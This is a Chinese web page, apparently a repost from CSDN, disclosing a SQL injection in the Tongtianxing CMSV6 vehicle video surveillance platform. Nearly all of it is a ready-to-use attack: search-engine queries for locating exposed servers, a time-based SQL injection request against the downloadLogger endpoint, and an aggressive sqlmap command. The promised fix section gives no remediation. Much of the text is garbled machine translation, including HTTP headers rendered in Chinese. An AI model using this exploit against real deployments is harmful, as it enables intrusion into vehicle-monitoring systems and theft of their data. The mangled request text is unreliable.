1. 速盾网络Home
  2. 网站运维

通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞

CSDN 网站运维

通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞
网络空间搜索
鹰图语法
web.body\”/808gps/\”fofa语法
body\”/808gps

通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞

网络空间搜索

词间语法

web.body=\’/808gps/\’

福法语法

身体=\’/808gps/\’

POC

GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1

主机:

缓存控制: max-age=0

Sec-Ch-Ua: \’非/A)品牌\’;v=\’8\’, \’Chromium\’;v=\’126\’, \’Google Chrome\’;v=\’126\’

Sec-Ch-Ua-Mobile:0

Sec-Ch-Ua-Platform:“Windows”

不安全的升级请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/126.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: 无

Sec-Fetch-Mode: 导航

Sec-Fetch-User:1

Sec-Fetch-Dest: 文档

Accept-Encoding: gzip、deflate、br

接受语言: zh-CN,zh;q=0.9

DNT: 1

Sec-Gpc: 1

优先级: u=0, i

关闭连接:

使用sqlmap进行注入

python sqlmap.py -r url.txt –batch -level 5 –risk 3 –random-agent –tamper=space2comment

修复建议

#同天行以上CMSV6禁用车辆视频监控平台SQL注入漏洞相关内容由网络提供,仅供大家参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93955.html

Like (0)
CSDN的头像CSDN
0 0
Previous 2024年7月26日
Next 2024年7月26日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注